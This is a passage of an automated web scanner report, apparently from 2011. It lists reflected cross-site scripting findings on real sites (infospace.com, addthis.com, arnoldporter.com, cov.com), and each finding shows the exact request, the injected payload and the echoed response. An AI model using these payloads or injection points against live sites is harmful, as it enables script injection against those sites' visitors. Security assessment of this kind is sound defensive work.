...[SNIP]...

4.53. http://wsdsapi.infospace.com/infomaster/widgets [submitid1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the submitid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9b6d'%3balert(1)//dd5166876a6 was submitted in the submitid1 parameter. This input was echoed as c9b6d';alert(1)//dd5166876a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkwc9b6d'%3balert(1)//dd5166876a6 HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 18:05:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=jNwawCmwO3s_WpmcrASVP4lAUo6C6z8GBAEXjg_f4A_72l8_zJqRCVQOO1kQh8lTTGZ7_nhSxJV-XZecIGydZ0HQE-T2rDbh3PSAWMeulwhCECSL6Smxm2zkGUgmhrjBO5wpjFWq99w-JHdJ-4hvtE31NWhJLe40EudQkHkfoV-yXj9m0; expires=Fri, 14-Dec-2012 04:45:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=2rci3t45uzkm0zeix2axfwv5; path=/
Set-Cookie: DomainSession=TransactionId=95cc2984d7be46e88ab5c7deaeb7cb01&SessionId=a968626e22924540b9cec7deaeb7cb01&ActionId=51d4497b031f4c5fa60dc7deaeb7cb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Wed, 19-Jan-2011 18:25:12 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=cd3692fcd30a4459b987c7deaeb7cb01&LastSeenDateTime=1/19/2011 6:05:12 PM&IssueDateTime=1/19/2011 6:05:12 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Fri, 26-Dec-2110 18:05:12 GMT; path=/
Cache-Control: public
Expires: Wed, 19 Jan 2011 19:05:12 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


                                   // variable contructors
var txtElements = [{txt:'qkw',btn:'sqkwc9b6d';alert(1)//dd5166876a6'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw');input1.setAttribute('autocomplete','off');

function JSONscriptRequest(fullUrl, query) {
// RE
...[SNIP]...

4.54. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12d9b<script>alert(1)</script>893317d02a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php12d9b<script>alert(1)</script>893317d02a5 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:26:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ukeipc25sb6n7ajap5tqd3fsa1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php12d9b<script>alert(1)</script>893317d02a5</strong>
...[SNIP]...

4.55. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8866e"-alert(1)-"49ee98219f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php8866e"-alert(1)-"49ee98219f7 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:26:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=tioju43rv1im39822nkpbqlp26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php8866e"-alert(1)-"49ee98219f7";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.56. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4591f"-alert(1)-"57e0244f404 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/4591f"-alert(1)-"57e0244f404 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/4591f"-alert(1)-"57e0244f404";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.57. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e6e"><script>alert(1)</script>277857ca11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices.cfm?u=FinancialServices&action=view&id=476&32e6e"><script>alert(1)</script>277857ca11c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Financial Services</title>
       <meta name="Descriptio
...[SNIP]...
<input type="hidden" name="32e6e"><script>alert(1)</script>277857ca11c" value="1" />
...[SNIP]...

4.58. http://www.arnoldporter.com/practices.cfm [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e37"><script>alert(1)</script>b1acff3e126 was submitted in the u parameter. This input was echoed as e8e37\"><script>alert(1)</script>b1acff3e126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices.cfm?u=FinancialServicese8e37"><script>alert(1)</script>b1acff3e126&action=view&id=476 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Financial Services</title>
       <meta name="Descriptio
...[SNIP]...
<input type="hidden" name="u" value="FinancialServicese8e37\"><script>alert(1)</script>b1acff3e126" />
...[SNIP]...

4.59. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ef8"><script>alert(1)</script>f0da3e29c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Publications</title>
       <meta name="Description" con
...[SNIP]...
<a href=" /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1&expand_section=advisory">
...[SNIP]...

4.60. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /about_the_firm/firm_history

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3824'-alert(1)-'1b19dddffc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about_the_firm/firm_history?b3824'-alert(1)-'1b19dddffc8=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:43:35 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1298; path=/
Set-Cookie: PortletId=1293201; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18798


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | About the Firm | Firm History</title>
<meta na
...[SNIP]...
about_the_firm/firm_history/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/about_the_firm/firm_history/AboutSection.aspx?b3824'-alert(1)-'1b19dddffc8=1';//]]>
...[SNIP]...

4.61. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /balancingworkandfamilylife

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec112'-alert(1)-'d654b8e90b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /balancingworkandfamilylife?ec112'-alert(1)-'d654b8e90b6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:05 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1155; path=/
Set-Cookie: PortletId=1146501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Work-Life Balance</title>
<meta na
...[SNIP]...
= '/balancingworkandfamilylife/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/balancingworkandfamilylife/Diversity.aspx?ec112'-alert(1)-'d654b8e90b6=1';//]]>
...[SNIP]...

4.62. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /bestviewed

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18d5'-alert(1)-'b19132c4a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bestviewed?e18d5'-alert(1)-'b19132c4a4f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1359; path=/
Set-Cookie: PortletId=1350401; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10955


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Best Viewed</title>
<meta name="language" cont
...[SNIP]...
document.aspnetForm.action = '/bestviewed/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/bestviewed/GeneralPageData.aspx?e18d5'-alert(1)-'b19132c4a4f=1';//]]>
...[SNIP]...

4.63. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /biographies

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b19'-alert(1)-'10a178ca3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /biographies?c3b19'-alert(1)-'10a178ca3f5=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:05 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1141; path=/
Set-Cookie: PortletId=1132501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 152733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Biographies</title>
<meta name="language" cont
...[SNIP]...
DATA[
document.aspnetForm.action = '/biographies/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/biographies/Search.aspx?c3b19'-alert(1)-'10a178ca3f5=1';//]]>
...[SNIP]...

4.64. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /diversityoverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c748'-alert(1)-'750bc24037f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversityoverview?8c748'-alert(1)-'750bc24037f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:34:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1151; path=/
Set-Cookie: PortletId=1142501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17851


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Overview</title>
<meta name="langu
...[SNIP]...
.aspnetForm.action = '/diversityoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/diversityoverview/Diversity.aspx?8c748'-alert(1)-'750bc24037f=1';//]]>
...[SNIP]...

4.65. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /diversityupdate

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d31'-alert(1)-'bf8e984b8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

